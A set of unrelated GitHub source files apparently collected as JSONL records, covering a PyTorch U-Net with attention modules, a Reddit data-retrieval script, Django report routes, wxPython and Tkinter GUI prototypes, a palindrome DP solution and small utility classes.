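 # Editor's note: unlike v2, v3 derives its channel split from a single\n # sigmoid gate -- gated channels pass through the skip connection while the\n # complementary channels are added back unchanged (see forward below).\n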
 def __init__(self,channel,type_of_connection=RegionalSkipConnect):\n super(RegionalAttentionConnectv3, self).__init__()\n self.connection = type_of_connection(channel)\n self.background_attention = GlobalAttentionModule(channel,16)\n self.spliced_attention = GlobalAttentionModuleJustSigmoid(channel,16)\n\n def forward(self,feature,mask):\n _,_,w,_ = feature.size()\n _,_,mw,_ = mask.size()\n # binarize the downsampled mask\n # select features from the background as additional features for the masked splicing region.\n mask = torch.round(F.avg_pool2d(mask,2,stride=mw//w))\n reverse_mask = -1*(mask-1)\n background = self.background_attention(feature) * reverse_mask\n chosen_channel = self.spliced_attention(feature)\n spliced_feature = chosen_channel * feature\n selected_feature = (1 - chosen_channel) * feature\n spliced = ( self.connection(spliced_feature) + selected_feature ) * mask\n return background + spliced \n\n\n\n\nclass RegionalAttentionConnectGaussianMask(nn.Module):\n def __init__(self,channel,type_of_connection=RegionalSkipConnect):\n super(RegionalAttentionConnectGaussianMask, self).__init__()\n self.connection = type_of_connection(channel)\n self.background_attention = GlobalAttentionModule(channel,16)\n self.mixed_attention = GlobalAttentionModule(channel,16)\n self.spliced_attention = GlobalAttentionModule(channel,16)\n self.gaussianMask = GaussianSmoothing(1,5,1)\n\n def forward(self,feature,mask):\n _,_,w,_ = feature.size()\n _,_,mw,_ = mask.size()\n # binarize the downsampled mask\n # select features from the background as additional features for the masked splicing region.\n if w != mw:\n mask = torch.round(F.avg_pool2d(mask,2,stride=mw//w))\n reverse_mask = -1*(mask-1)\n # here we apply a gaussian filter to mask and reverse_mask for better harmonization of edges.\n\n mask = self.gaussianMask(F.pad(mask,(2,2,2,2),mode='reflect'))\n reverse_mask = self.gaussianMask(F.pad(reverse_mask,(2,2,2,2),mode='reflect'))\n\n\n background = self.background_attention(feature) * reverse_mask\n selected_feature = self.mixed_attention(feature)\n spliced_feature = self.spliced_attention(feature)\n spliced = ( self.connection(spliced_feature) + selected_feature ) * mask\n return background + spliced \n\n\n\nclass MinimalUnet(nn.Module):\n \"\"\"docstring for MinimalUnet\"\"\"\n def __init__(self, down=None,up=None,submodule=None,attention=None,withoutskip=False):\n super(MinimalUnet, self).__init__()\n \n self.down = nn.Sequential(*down)\n self.up = nn.Sequential(*up) \n self.sub = submodule\n self.attention = attention\n self.withoutskip = withoutskip\n self.is_attention = self.attention is not None\n self.is_sub = submodule is not None\n\n \n def forward(self,x,mask=None):\n if self.is_sub: \n x_up,_ = self.sub(self.down(x),mask)\n else:\n x_up = self.down(x)\n\n if self.is_attention:\n x = self.attention(x,mask)\n \n if self.withoutskip: #outer or inner.\n x_out = self.up(x_up)\n else:\n x_out = (torch.cat([x,self.up(x_up)],1),mask)\n\n return x_out\n\n \n\n# Defines the submodule with skip connection.\n# X -------------------identity---------------------- X\n# |-- downsampling -- |submodule| -- upsampling --|\nclass UnetSkipConnectionBlock(nn.Module):\n def __init__(self, outer_nc, inner_nc, input_nc=None,\n submodule=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d, use_dropout=False,is_attention_layer=False,attention_model=RegionalAttentionConnect):\n super(UnetSkipConnectionBlock, self).__init__()\n self.outermost = outermost\n if type(norm_layer) == functools.partial:\n use_bias = norm_layer.func 
== nn.InstanceNorm2d\n else:\n use_bias = norm_layer == nn.InstanceNorm2d\n if input_nc is None:\n input_nc = outer_nc\n downconv = nn.Conv2d(input_nc, inner_nc, kernel_size=4,\n stride=2, padding=1, bias=use_bias)\n downrelu = nn.LeakyReLU(0.2, True)\n downnorm = norm_layer(inner_nc)\n uprelu = nn.ReLU(True)\n upnorm = norm_layer(outer_nc)\n\n if outermost:\n upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,\n kernel_size=4, stride=2,\n padding=1)\n down = [downconv]\n up = [uprelu, upconv]\n model = MinimalUnet(down,up,submodule,withoutskip=outermost)\n elif innermost:\n upconv = nn.ConvTranspose2d(inner_nc, outer_nc,\n kernel_size=4, stride=2,\n padding=1, bias=use_bias)\n down = [downrelu, downconv]\n up = [uprelu, upconv, upnorm]\n model = MinimalUnet(down,up)\n else:\n upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,\n kernel_size=4, stride=2,\n padding=1, bias=use_bias)\n down = [downrelu, downconv, downnorm]\n up = [uprelu, upconv, upnorm]\n\n if is_attention_layer:\n attention_model = attention_model(input_nc)\n else:\n attention_model = None\n if use_dropout:\n model = MinimalUnet(down,up.append(nn.Dropout(0.5)),submodule,attention_model)\n else:\n model = MinimalUnet(down,up,submodule,attention_model)\n\n self.model = model\n\n\n def forward(self, x,mask):\n # build the mask for attention use\n return self.model(x,mask)\n \nclass UnetGenerator(nn.Module):\n def __init__(self, input_nc, output_nc, num_downs=8, ngf=64,\n norm_layer=nn.BatchNorm2d, use_dropout=False,is_attention_layer=False,attention_model=RegionalAttentionConnect,use_inner_attention=False):\n super(UnetGenerator, self).__init__()\n\n # 8 for 256x256\n # 9 for 512x512\n # construct unet structure\n self.need_mask = not input_nc == output_nc\n\n unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=None, norm_layer=norm_layer, innermost=True) # 1\n for i in range(num_downs - 5): #3 times\n unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=unet_block, norm_layer=norm_layer, use_dropout=use_dropout,is_attention_layer=use_inner_attention,attention_model=attention_model) # 8,4,2\n unet_block = UnetSkipConnectionBlock(ngf * 4, ngf * 8, input_nc=None, submodule=unet_block, norm_layer=norm_layer,is_attention_layer=is_attention_layer,attention_model=attention_model) #16\n unet_block = UnetSkipConnectionBlock(ngf * 2, ngf * 4, input_nc=None, submodule=unet_block, norm_layer=norm_layer,is_attention_layer=is_attention_layer,attention_model=attention_model) #32\n unet_block = UnetSkipConnectionBlock(ngf, ngf * 2, input_nc=None, submodule=unet_block, norm_layer=norm_layer,is_attention_layer=is_attention_layer,attention_model=attention_model) #64 \n unet_block = UnetSkipConnectionBlock(output_nc, ngf, input_nc=input_nc, submodule=unet_block, outermost=True, norm_layer=norm_layer) # 128\n\n self.model = unet_block\n\n def forward(self, input):\n if self.need_mask:\n return self.model(input,input[:,3:4,:,:])\n else:\n return self.model(input[:,0:3,:,:],input[:,3:4,:,:])","repo_name":"vinthony/s2am","sub_path":"scripts/models/unetseg.py","file_name":"unetseg.py","file_ext":"py","file_size_in_byte":21209,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"40"} +{"seq_id":"73461080760","text":"####################\n### Imports\n####################\n\n## Standard Libary\nimport sys\nimport os\nimport sys\nimport jsonlines\nimport json\nimport gzip\nimport argparse\nfrom time import sleep\nimport logging\n\n## External\nimport pandas 
as pd\nfrom tqdm import tqdm\n\n## Local\nfrom retriever import Reddit\nfrom retriever.util.helpers import chunks\n\n####################\n### Globals\n####################\n\n## Logging\nlogging.basicConfig(level=logging.INFO)\nLOGGER = logging.getLogger()\n\n## Filter Columns (To Reduce Request Load)\nSUBMISSION_COLS = [\n \"author\",\n \"author_fullname\",\n \"num_comments\",\n \"created_utc\",\n \"id\",\n \"permalink\",\n \"selftext\",\n \"title\",\n \"subreddit\",\n \"subreddit_id\",\n]\n\n\n####################\n### Functions\n####################\n\ndef parse_arguments():\n \"\"\"\n\n Parse command-line to identify configuration filepath.\n Args:\n None\n\n Returns:\n args (argparse Object): Command-line argument holder.\n \"\"\"\n ## Initialize Parser Object\n parser = argparse.ArgumentParser(description=\"Query Reddit Submissions and Comments\")\n ## Generic Arguments\n parser.add_argument(\"subreddit\", type=str, help=\"Name of the subreddit to find submissions and comments for\")\n parser.add_argument(\"--output-dir\", required=True, type=str, help=\"Path to output directory\")\n parser.add_argument(\"--comments-only\", action=\"store_true\",\n help=\"Only query comments from already pulled submissions in --output-dir\")\n parser.add_argument(\"--start-date\", type=str, default=\"2019-01-01\", help=\"Start date for data\")\n parser.add_argument(\"--end-date\", type=str, default=\"2020-08-01\", help=\"End date for data\")\n parser.add_argument(\"--query-freq\", type=str, default=\"7D\", help=\"How to break up the submission query\")\n parser.add_argument(\"--min-comments\", type=int, default=0,\n help=\"Filtering criteria for querying comments based on submissions\")\n parser.add_argument(\"--use-praw\", action=\"store_true\", default=False,\n help=\"Retrieve Official API data objects (at expense of query time) instead of Pushshift.io data\")\n parser.add_argument(\"--chunksize\", type=int, default=50,\n help=\"Number of submissions to query comments from simultaneously\")\n parser.add_argument(\"--sample-percent\", type=float, default=1, help=\"Submission sample percent (0, 1]\")\n parser.add_argument(\"--random-state\", type=int, default=42, help=\"Sample seed for any submission sampling\")\n parser.add_argument(\"--debug\", action=\"store_true\", help=\"Run script in debug mode.\")\n parser.add_argument(\"--log-file\", type=str, help=\"Write log to file instead of standard out (terminal)\")\n parser.add_argument(\"--limit-submission-metadata\", action=\"store_true\",\n help=f\"Limit retrieved submission metadata to {SUBMISSION_COLS}\")\n ## Parse Arguments\n args = parser.parse_args()\n return args\n\n\ndef create_dir(directory):\n \"\"\"Create directory if it does not exist\"\"\"\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef get_date_range(start_date,\n end_date,\n query_freq):\n \"\"\"\n\n \"\"\"\n ## Query Date Range\n DATE_RANGE = list(pd.date_range(start_date, end_date, freq=query_freq))\n if len(DATE_RANGE) == 0:\n LOGGER.error(f\"Start, End Date, and Query frequency are not compatible. 
Or provided end date ({str(end_date)}) is before start date ({str(start_date)})\")\n exit(1)\n if pd.to_datetime(start_date) < DATE_RANGE[0]:\n DATE_RANGE = [pd.to_datetime(start_date)] + DATE_RANGE\n if pd.to_datetime(end_date) > DATE_RANGE[-1]:\n DATE_RANGE = DATE_RANGE + [pd.to_datetime(end_date)]\n DATE_RANGE = [d.date().isoformat() for d in DATE_RANGE]\n return DATE_RANGE\n\n\ndef main():\n \"\"\"Main program\"\"\"\n ## Parse Arguments\n args = parse_arguments()\n\n ## Adjust logging if needed\n if args.debug:\n LOGGER.setLevel(logging.DEBUG)\n if args.log_file:\n LOGGER.addHandler(logging.FileHandler(args.log_file))\n\n ## Initialize Reddit API Wrapper\n reddit = Reddit(init_praw=args.use_praw, logger=LOGGER)\n ## Create Output Directory\n create_dir(args.output_dir)\n ## Get Date Range\n DATE_RANGE = get_date_range(args.start_date,\n args.end_date,\n args.query_freq)\n ## Create Output Directory\n LOGGER.info(f\"\\nStarting Query for r/{args.subreddit}\")\n SUBREDDIT_OUTDIR = f\"{args.output_dir}/{args.subreddit}/\"\n SUBREDDIT_SUBMISSION_OUTDIR = f\"{SUBREDDIT_OUTDIR}submissions/\"\n create_dir(SUBREDDIT_OUTDIR)\n create_dir(SUBREDDIT_SUBMISSION_OUTDIR)\n\n ## Get subreddit info\n meta_file = f\"{SUBREDDIT_OUTDIR}metadata.json.gz\"\n if os.path.exists(meta_file):\n with gzip.open(meta_file, \"rt\") as f:\n meta = json.load(f)\n # Fix date range to not query before subreddit was founded\n created = pd.to_datetime(meta.get(\"created_utc\"))\n if created > pd.to_datetime(args.start_date):\n LOGGER.info(f\"r/{args.subreddit} did not exist until {created}. Changing start date from {args.start_date} to {created}\")\n DATE_RANGE = get_date_range(created,\n args.end_date,\n args.query_freq)\n elif args.use_praw:\n LOGGER.info(f\"Pulling subreddit metadata\")\n meta = reddit.retrieve_subreddit_metadata(args.subreddit)\n meta[\"created_utc\"] = str(pd.to_datetime(meta.get(\"created_utc\"), unit=\"s\"))\n with gzip.open(meta_file, \"wt\") as f:\n json.dump(meta, f)\n\n # Fix date range to not query before subreddit was founded\n created = pd.to_datetime(meta.get(\"created_utc\"))\n if created > pd.to_datetime(args.start_date):\n LOGGER.info(f\"r/{args.subreddit} did not exist until {created}. Changing start date from {args.start_date} to {created}\")\n DATE_RANGE = get_date_range(created,\n args.end_date,\n args.query_freq)\n\n ## Identify Submission Data\n submission_files = []\n if not args.comments_only:\n LOGGER.info(\"Pulling Submissions\")\n submission_counts = 0\n for dstart, dstop in tqdm(list(zip(DATE_RANGE[:-1], DATE_RANGE[1:])), desc=\"Date Range\", file=sys.stdout):\n submission_file = f\"{SUBREDDIT_SUBMISSION_OUTDIR}{dstart}_{dstop}.json.gz\"\n if os.path.exists(submission_file):\n LOGGER.info(f\"Skipping {submission_file} because it already exists.\")\n submission_files.append(submission_file)\n continue\n ## Query Submissions\n subreddit_submissions = reddit.retrieve_subreddit_submissions(args.subreddit,\n start_date=dstart,\n end_date=dstop,\n limit=None,\n cols=SUBMISSION_COLS if args.limit_submission_metadata else None)\n if subreddit_submissions is not None and not subreddit_submissions.empty:\n submission_counts += len(subreddit_submissions)\n subreddit_submissions.to_json(submission_file, orient=\"records\", lines=True, compression=\"gzip\")\n submission_files.append(submission_file)\n\n LOGGER.info(\n \"Found {:,d} submissions. 
Note this number does not include pre-pulled submissions\".format(submission_counts))\n if submission_counts == 0 and len(submission_files) == 0:\n LOGGER.info(f\"No submissions found from {DATE_RANGE[0]} to {DATE_RANGE[-1]}. Exiting.\")\n sys.exit(0)\n\n ## Pull Comments\n LOGGER.info(\"Pulling Comments\")\n SUBREDDIT_COMMENTS_DIR = f\"{SUBREDDIT_OUTDIR}comments/\"\n _ = create_dir(SUBREDDIT_COMMENTS_DIR)\n if not submission_files:\n submission_files = [f\"{SUBREDDIT_SUBMISSION_OUTDIR}/{p}\" for p in os.listdir(SUBREDDIT_SUBMISSION_OUTDIR)]\n for sub_file in tqdm(submission_files, desc=\"Date Range\", position=0, leave=False, file=sys.stdout):\n subreddit_submissions = pd.read_json(sub_file, lines=True)\n if subreddit_submissions.empty:\n continue\n if args.sample_percent < 1:\n subreddit_submissions = subreddit_submissions.sample(frac=args.sample_percent,\n random_state=args.random_state,\n replace=False).reset_index(drop=True).copy()\n link_ids = subreddit_submissions.loc[subreddit_submissions[\"num_comments\"] > args.min_comments][\"id\"].tolist()\n # Skip submissions where comments were already pulled\n num_total_links = len(link_ids)\n link_ids = [l for l in link_ids if not os.path.exists(f\"{SUBREDDIT_COMMENTS_DIR}{l}.json.gz\")]\n num_processed_links = num_total_links - len(link_ids)\n LOGGER.info(f\"Already processed comments from {num_processed_links} submissions. Skipping those.\")\n if len(link_ids) == 0:\n continue\n link_id_chunks = list(chunks(link_ids, args.chunksize))\n for link_id_chunk in tqdm(link_id_chunks, desc=\"Submission Chunks\", position=1, leave=False, file=sys.stdout):\n link_df = reddit.retrieve_submission_comments(link_id_chunk)\n for link_id in link_id_chunk:\n link_file = f\"{SUBREDDIT_COMMENTS_DIR}{link_id}.json.gz\"\n if link_df is not None and not link_df.empty:\n link_id_df = link_df.loc[link_df[\"link_id\"] == f\"t3_{link_id}\"]\n if not link_id_df.empty:\n link_id_df.to_json(link_file, orient=\"records\", lines=True, compression=\"gzip\")\n\n LOGGER.info(\"Script complete.\")\n\n\n####################\n### Execute\n####################\nif __name__ == \"__main__\":\n main()\n","repo_name":"AADeLucia/retriever","sub_path":"utilities/retrieve_subreddit_data.py","file_name":"retrieve_subreddit_data.py","file_ext":"py","file_size_in_byte":10143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41677688170","text":"# Define filter functions\ndef filterKeywords(articles, keywords, fields, keep=True): #filter for keywords\n filteredArticles = []\n for article in articles:\n if article.checkKeywords(keywords, fields) is keep:\n filteredArticles.append(article)\n \n return(filteredArticles)\n\ndef filterLikes(articles, likeThreshold):\n filteredArticles = []\n for article in articles:\n if int(article.likes) >= int(likeThreshold):\n filteredArticles.append(article)\n \n return filteredArticles","repo_name":"guylaboque/mediumbot","sub_path":"src/mediumcrawler/listfilters.py","file_name":"listfilters.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"32425527166","text":"\nfrom django.urls import path\nfrom . 
import views\n\n\nurlpatterns = [\n path('create-for-comment//', views.create_report_comment, name='create_report_comment'),\n path('create-for-project/', views.create_report_project, name='create_report_project'),\n path('show-for-project/', views.show_report_project, name='show_report_project'),\n path('show-for-comment/', views.show_report_comment, name='show_report_comment'),\n path('delete-for-comment/', views.delete_report_comment, name='delete_report_comment'),\n path('delete-for-project/', views.delete_report_project, name='delete_report_project'),\n\n]\n\n\n","repo_name":"ahmedmumdouh/CrowdFundingApp","sub_path":"CrowdFunding/reports/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"25204787128","text":"import wx\nimport models\nfrom datalist import DataList, TerminalList, CircuitList, UltimateCircuitList, OLVCircuitList\nfrom new_circuit import NewCircuitWindow\n\nclass CTSWindow(wx.Frame):\n\tdef __init__(self, parent):\n\t\twx.Frame.__init__(self, parent, title = \"Connector Addition\", size=(640,480))\n\t\tpanel = wx.Panel(self, wx.ID_ANY)\n\n\t\tvbox = wx.BoxSizer(wx.VERTICAL)\n\n\t\thbox1 = wx.BoxSizer(wx.HORIZONTAL)\n\t\tst1 = wx.StaticText(panel, -1, label = \"Connector DWG P/N: \")\n\t\tst1.Wrap(200)\n\t\tself.connector_part_num = wx.TextCtrl(panel)\n\n\t\tst2 = wx.StaticText(panel, -1, label = \"Identified P/N:\")\n\t\tself.identified_part_num = wx.TextCtrl(panel)\n\n\t\thbox1.Add(st1, flag = wx.RIGHT, border = 8)\n\t\thbox1.Add(self.connector_part_num, border = 8, proportion = 1)\n\t\thbox1.Add(st2, border = 8)\n\t\thbox1.Add(self.identified_part_num, border = 8, proportion = 1)\n\n\t\tst3 = wx.StaticText(panel, -1, label = \"Location: \")\n\t\tself.location_tc = wx.TextCtrl(panel)\n\n\t\tst4 = wx.StaticText(panel, -1, label = \"Colour\")\n\t\tself.colour_tc = wx.TextCtrl(panel)\n\n\t\thbox2 = wx.BoxSizer(wx.HORIZONTAL)\n\t\thbox2.Add(st3, flag = wx.RIGHT, border = 8)\n\t\thbox2.Add(self.location_tc, border = 8, proportion = 1)\n\t\thbox2.Add(st4, flag = wx.RIGHT, border = 8)\n\t\thbox2.Add(self.colour_tc, border = 8, proportion = 1)\n\n\t\tself.TerminalList = TerminalList(panel)\n\n\t\tvbox.Add(hbox1, flag = wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border = 10)\n\t\tvbox.Add(hbox2, flag = wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border = 10)\n\t\tvbox.Add(self.TerminalList, flag = wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border = 10)\n\t\tpanel.SetSizer(vbox)\n\t\tself.Show(True)\n\nclass CircuitWindow(wx.Frame):\n\tdef __init__(self, parent):\n\t\twx.Frame.__init__(self, parent, title = \"Circuit Table\", size=(600,800))\n\n\t\tpanel = wx.Panel(self, wx.ID_ANY)\n\t\tvbox = wx.BoxSizer(wx.VERTICAL)\n\t\tself.CircuitList = CircuitList(panel)\n\t\t# self.CircuitList = UltimateCircuitList(self)\n\t\t# self.CircuitList = OLVCircuitList(panel)\n\t\tvbox.Add(self.CircuitList, flag = wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP|wx.BOTTOM, border = 10)\n\t\tpanel.SetSizer(vbox)\n\t\tself.Show(True)\n\nclass MainWindow(wx.Frame):\n\tdef __init__(self, parent, title):\n\n\t\twx.Frame.__init__(self, parent, title = title, size=(600,800))\n\t\tpanel = wx.Panel(self, wx.ID_ANY)\n\t\tself.lb = DataList(panel)\n\t\tself.add_tube()\n\t\tself.Show(True)\n\n\tdef add_tube(self):\n\t\ttheTube = models.Tubes.get(models.Tubes.id == 1)\n\t\tself.lb.Append([theTube.location, '', '', theTube.type \n\t\t\t+ \" \" + theTube.diameter, '', theTube.length])\n\napp = wx.App(False)\nframe = 
MainWindow(None, \"Hello World\")\nframe2 = NewCircuitWindow(None)\n# frame2 = CTSWindow(None)\nframe3 = CircuitWindow(None)\nprint(models.Tubes.get(models.Tubes.id == 1).diameter)\napp.MainLoop()","repo_name":"saadabbasi/improved-fiesta","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10349321247","text":"import sys\n\ndef input():\n    return sys.stdin.readline().rstrip()\n\nN = int(input())\nINF = float('inf')\narr = list(map(int,input().split()))\ndp = [[INF for _ in range(N)] for _ in range(N)]\n\n\nfor left in range(N-1,-1,-1):\n    for right in range(left,N):\n        if left == right:\n            dp[left][right] = 0\n        elif left + 1 == right and arr[left] == arr[right]:\n            dp[left][right] = 0\n        else:\n            if arr[left] == arr[right]:\n                dp[left][right] = dp[left+1][right-1]\n            dp[left][right] = min(dp[left][right] , 1 + min(dp[left+1][right] , dp[left][right-1]))\nprint(dp[0][N-1])","repo_name":"gkgg123/algorithm_2022","sub_path":"1695_팰린드롬_만들기_version2.py","file_name":"1695_팰린드롬_만들기_version2.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22823424215","text":"from freezegun import freeze_time\n\nfrom flowmaster.operators.etl.service import ETLOperator\nfrom tests.fixtures.yandex_metrika import yml_visits_to_csv_config\n\n\n@freeze_time(\"2021-01-01\")\ndef test_jinja_template():\n    yml_visits_to_csv_config.name = \"flow\"\n    yml_visits_to_csv_config.load.file_name = (\n        \"{{name}} {{provider}} {{storage}} {{ datetime.date() }}.tsv\"\n    )\n    yml_visits_to_csv_config.load.add_data_before = (\n        \"{{name}} {{provider}} {{storage}} {{ datetime.date() }}.tsv\"\n    )\n    yml_visits_to_csv_config.load.add_data_after = (\n        \"{{name}} {{provider}} {{storage}} {{ datetime.date() }}.tsv\"\n    )\n\n    flow = ETLOperator(yml_visits_to_csv_config)\n\n    assert flow.Load.file_name == \"flow yandex_metrika_logs csv 2021-01-01.tsv\"\n    assert flow.Load.add_data_before == \"flow yandex_metrika_logs csv 2021-01-01.tsv\"\n    assert flow.Load.add_data_after == \"flow yandex_metrika_logs csv 2021-01-01.tsv\"\n","repo_name":"TrendingTechnology/FlowMaster","sub_path":"tests/test_loaders/test_csv.py","file_name":"test_csv.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"73629783159","text":"class SlowLog(object):\n\n    def __init__(self, command, startTime, executionTime, shardId=None):\n        \"\"\"\n        :param command: the command\n        :param startTime: command start time (UTC in ISO 8601 format: YYYY-MM-DDTHH:mm:ssZ)\n        :param executionTime: command execution duration (with unit)\n        :param shardId: (Optional) id of the shard that executed the command\n        \"\"\"\n\n        self.command = command\n        self.startTime = startTime\n        self.executionTime = executionTime\n        self.shardId = shardId\n","repo_name":"jdcloud-api/jdcloud-sdk-python","sub_path":"jdcloud_sdk/services/redis/models/SlowLog.py","file_name":"SlowLog.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"40"} +{"seq_id":"22835268289","text":"# Displays the result stored in a variable and shows its type\r\na = 5.\r\nb = 6\r\nc = a + b\r\nprint(c, type(c))\r\n\r\n# Performs an in-place addition\r\nd = 10\r\nd += 5\r\nprint(d)\r\n\r\n# Raising numbers to a power\r\na = 10**2\r\nprint(a)\r\n\r\n# Complex numbers\r\nn_1 = 5 + 1j\r\nn_2 = 6 + 1j\r\nprint(n_1 + n_2)
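\r\n# Editor's note: complex literals use the j suffix, so (5 + 1j) + (6 + 1j) prints (11+2j)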
\r\n# Converts a string to a number\r\nstring_n = '123'\r\nn_3 = float(string_n)\r\nsoma = n_3 + n_3\r\nprint(soma)\r\n\r\n\r\n\r\n","repo_name":"iAMgui43/Python","sub_path":"Básico Python/Números.py","file_name":"Números.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42602566507","text":"from tkinter import *\nfrom tkinter import filedialog\n\n#1a2634\n#203e5f\n#eec550\n#f9e3a3\n\nmain = Tk()\nmain.title('Prototype Beta')\nmain.geometry('500x350')\nmain.configure(background='#1a2634')\n\ndef cal():\n\n    def submit(value, event=None):\n        print(value)\n        cng = str(value)\n        print(cng+'lol')\n    \n    cal = Toplevel(main)  # a Toplevel keeps a single Tk root\n    cal.title('Calendar')\n    cal.geometry('500x350')\n    cal.configure(background='#1a2634')\n\n    days1 = StringVar(cal)\n    days = [\n        'Enter Day',\n        'Saturday',\n        'Sunday',\n        'Monday',\n        'Tuesday',\n        'Wednesday',\n        'Thursday',\n        'Friday'\n    ]\n    days1.set('Enter Day')\n\n    calfr = Frame(cal, bg='#203e5f', height='50', width='50')\n    calfr.grid(row=0, column=0, pady=(10,0))\n    call = Label(calfr, text='Enter Food And Day', bg='#203e5f')\n    cald = OptionMenu(calfr, days1, *days, command=lambda value: submit(value))\n    cal.bind('', submit)\n    cale = Entry(calfr, highlightbackground='#203e5f')\n    call.grid(row=0, column=0)\n    cald.grid(row=1, column=0)\n    cale.grid(row=2, column=0)\n\ndef test():\n    print('yeet')\n    \ntopframe = Frame(main, bg='#eec550',height='30')\ntopframe.grid(row=0, column=0) # make as wide as main\ncan1 = Canvas(topframe,height='20',width='125',bg='#eec550',highlightthickness=0)\ncan1.create_line(0, 5, 20, 5,fill='#203e5f')\ncan1.create_line(0, 10, 20, 10,fill='#203e5f')\ncan1.create_line(0, 15, 20, 15,fill='#203e5f')\ncan1.bind('test', test)\nbu1 = Button(topframe, text='Calendar', highlightbackground='#eec550', command=cal)\nbu2 = Button(topframe, text='Add A Recipe', highlightbackground='#eec550', command=test)\nbu3 = Button(topframe, text='Shopping List', highlightbackground='#eec550', command=test)\ncan1.grid(row=0, column=0)\nbu1.grid(row=0, column=1)\nbu2.grid(row=0, column=2)\nbu3.grid(row=0, column=3, padx=(1, 130))\n\ncal = Frame(main, bg='#203e5f', height='50', width='350')\ncal.grid(row=1, column=0)\nday1 = Label(cal, text='Monday', bg='#203e5f')\nday2 = Label(cal, text='Tuesday', bg='#203e5f')\nday3 = Label(cal, text='Wednesday', bg='#203e5f')\nday4 = Label(cal, text='Thursday', bg='#203e5f')\nday5 = Label(cal, text='Friday', bg='#203e5f')\nday6 = Label(cal, text='Saturday', bg='#203e5f')\nday7 = Label(cal, text='Sunday', bg='#203e5f')\nday1.grid(row=0, column=0)\nday2.grid(row=0, column=1)\nday3.grid(row=0, column=2)\nday4.grid(row=0, column=3)\nday5.grid(row=0, column=4)\nday6.grid(row=0, column=5)\nday7.grid(row=0, column=6)\n\nday1f = Label(cal, text='Food1', bg='#203e5f')\nday2f = Label(cal, text='Food2', bg='#203e5f')\nday3f = Label(cal, text='Food3', bg='#203e5f')\nday4f = Label(cal, text='Food4', bg='#203e5f')\nday5f = Label(cal, text='Food5', bg='#203e5f')\nday6f = Label(cal, text='Food6', bg='#203e5f')\nday7f = Label(cal, text='Food7', bg='#203e5f')\nday1f.grid(row=1, column=0)\nday2f.grid(row=1, column=1)\nday3f.grid(row=1, column=2)\nday4f.grid(row=1, column=3)\nday5f.grid(row=1, column=4)\nday6f.grid(row=1, column=5)\nday7f.grid(row=1, column=6)\n\nunits1 = StringVar(main)\nunits2 = StringVar(main)\nchoices = [\n    'Choose',\n    'Meters',\n    'Miles'\n]\nunits1.set('Choose')\nunits2.set('Choose')\n\notr = Frame(main, bg='#203e5f', height='50', width='50')\notr.grid(row=2, column=0, pady=(10,0))
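\n# Editor's sketch (hypothetical helper, not yet wired to the widgets): the\n# conversion the Easy Converter below could perform between its two units.\ndef convert_length(value, from_unit, to_unit):\n    METERS_PER_MILE = 1609.344  # exact, by definition of the international mile\n    if (from_unit, to_unit) == ('Meters', 'Miles'):\n        return value / METERS_PER_MILE\n    if (from_unit, to_unit) == ('Miles', 'Meters'):\n        return value * METERS_PER_MILE\n    return value  # same (or unchosen) units pass through unchanged\n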
column=0, pady=(10,0))\nconl = Label(otr, text='Easy Converter', bg='#203e5f')\ncon1 = OptionMenu(otr, units1, *choices)\ncon2 = OptionMenu(otr, units2, *choices)\nconin1 = Entry(otr, highlightbackground='#203e5f')\nconin2 = Entry(otr, highlightbackground='#203e5f')\nconl.grid(row=0, column=0)\ncon1.grid(row=1, column=0)\ncon2.grid(row=1, column=1)\nconin1.grid(row=2, column=0)\nconin2.grid(row=2, column=1)\n\npr = Frame(main, bg='#203e5f', height='50', width='50')\npr.grid(row=3, column=0, pady=(10,0))\np1 = Button(pr, text='Print Calender', highlightbackground='#203e5f', command=test)\np2 = Button(pr, text='Print List', highlightbackground='#203e5f', command=test)\np3 = Button(pr, text='Print Recipie', highlightbackground='#203e5f', command=test)\np1.grid(row=0, column=0)\np2.grid(row=1, column=0)\np3.grid(row=2, column=0)\n\nrate = StringVar()\n\nrd = Frame(main, bg='#203e5f', height='50', width='50')\nrd.grid(row=4, column=0, pady=(10,0))\nla = Label(rd, text='How would you rate your most recent meal?', bg='#203e5f')\nr1 = Radiobutton(rd, text='1', variable=rate, value='1', bg='#203e5f')\nr2 = Radiobutton(rd, text='2', variable=rate, value='2', bg='#203e5f')\nr3 = Radiobutton(rd, text='3', variable=rate, value='3', bg='#203e5f')\nr4 = Radiobutton(rd, text='4', variable=rate, value='4', bg='#203e5f')\nr5 = Radiobutton(rd, text='5', variable=rate, value='5', bg='#203e5f')\nla.grid(row=0, column=0)\nr1.grid(row=1, column=1)\nr2.grid(row=1, column=2)\nr3.grid(row=1, column=3)\nr4.grid(row=1, column=4)\nr5.grid(row=1, 